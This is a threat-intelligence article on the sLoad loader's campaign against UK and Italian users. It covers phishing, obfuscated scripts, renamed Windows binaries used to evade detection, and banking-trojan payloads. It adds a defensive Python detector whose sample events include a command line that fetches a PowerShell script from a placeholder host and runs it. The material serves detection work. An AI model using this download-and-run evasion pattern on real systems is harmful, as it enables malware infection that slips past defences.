sLoad (aka Starslord loader) is active again, and this time it is targeting users in the U.K. and Italy. It has been active since 2018 and has received several updates lately. The malware's creator regularly changes the first-stage script, while the main module largely remains the same.
What was discovered?
According to Minerva Labs, sLoad infections have been observed on Italian endpoints since the beginning of this year. Last week, a payments-themed sLoad campaign was spreading via compromised Posta Elettronica Certificata (PEC), Italy's certified email service.
This time the malware's authors have taken a different approach: instead of using an executable or a malicious document to infiltrate machines, they use scripts native to Windows.
These native VBS and PowerShell scripts serve as the initial foothold. The attackers trick recipients into executing them via spear-phishing emails.
The attackers use an obfuscated WSF script that decodes a set of malicious commands. Once executed, it stealthily downloads a remote payload and runs it in memory.
As an evasion technique, the script renames the genuine Windows binaries bitsadmin.exe and powershell.exe. The renamed bitsadmin downloads a PowerShell script, and the renamed PowerShell loads it into memory and starts its execution.
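Renaming the binaries defeats detections that key only on the process name, so a defender wants a check that keys on something the rename does not change. The following is an added detection example, not code from the article or from the sLoad authors: it assumes process-creation events in the style of Sysmon Event ID 1, where `Image` is the path actually executed and `OriginalFileName` is the name embedded in the PE's version resource (which survives a rename), and it flags any event where a watched original name runs under a different file name. The event format and the sample events are constructed for the demonstration.

```python
"""Flag renamed copies of bitsadmin.exe / powershell.exe in process-creation logs.

Added example, not from the article. Assumes Sysmon-style process-creation
events with an `Image` field (path executed) and an `OriginalFileName` field
(name from the PE version resource). The 'key=value|key=value' line format
and all sample events below are constructed for this demonstration.
"""
import ntpath

# Binaries the article says sLoad renames as an evasion step, as they appear
# in the OriginalFileName field (compared case-insensitively).
WATCHED_ORIGINAL_NAMES = {"bitsadmin.exe", "powershell.exe"}


def parse_event(line):
    """Parse one constructed 'key=value|key=value' event line into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def is_renamed_lolbin(event):
    """True when a watched binary runs under a name other than its original one."""
    original = event.get("OriginalFileName", "").lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    return original in WATCHED_ORIGINAL_NAMES and image != original


def find_renamed_lolbins(lines):
    """Return (image, original_name, command_line) for every suspicious event."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_renamed_lolbin(ev):
            hits.append((ev["Image"], ev["OriginalFileName"], ev.get("CommandLine", "")))
    return hits


# Constructed sample events: two legitimate invocations, two renamed copies.
# Paths, names and the example.invalid host are placeholders, not real indicators.
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Windows\\System32\\bitsadmin.exe"
    "|OriginalFileName=bitsadmin.exe|CommandLine=bitsadmin /list",
    "EventID=1|Image=C:\\Users\\Public\\svc.exe"
    "|OriginalFileName=bitsadmin.exe"
    "|CommandLine=svc.exe /transfer job http://example.invalid/s.ps1 C:\\Users\\Public\\s.ps1",
    "EventID=1|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|OriginalFileName=PowerShell.EXE|CommandLine=powershell Get-Date",
    "EventID=1|Image=C:\\Users\\Public\\update.exe"
    "|OriginalFileName=PowerShell.EXE|CommandLine=update.exe -File C:\\Users\\Public\\s.ps1",
]

if __name__ == "__main__":
    for image, original, cmd in find_renamed_lolbins(SAMPLE_EVENTS):
        print(f"renamed {original} running as {image}: {cmd}")
```

Only the two events whose executed file name differs from the embedded original name are reported; the legitimate bitsadmin and powershell runs pass, because the comparison ignores case and path. In a real pipeline the same check can be keyed on the file hash as well, since neither the version resource nor the hash changes when a file is renamed.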
Final payloads and scripts
sLoad's final payload varies, but it has been seen dropping the Ramnit and Trickbot banking trojans. Both are dangerous and may even lead to ransomware attacks.
Initial reports on this malware disclosed that it used a rogue LNK file (a Windows shortcut) to download a PowerShell script, which in turn downloaded and executed sLoad.
Later editions used obfuscated VBS/WSF scripts, which are frequently mutated to bypass AV detection. The initial script used in the attacks is designed to evade security tools such as EDRs.
sLoad is a dangerous malware, and its recent activity is a serious concern. It is continually developed and updated by its authors and has become more advanced in recent years. Organizations should therefore take this threat seriously and apply adequate security measures.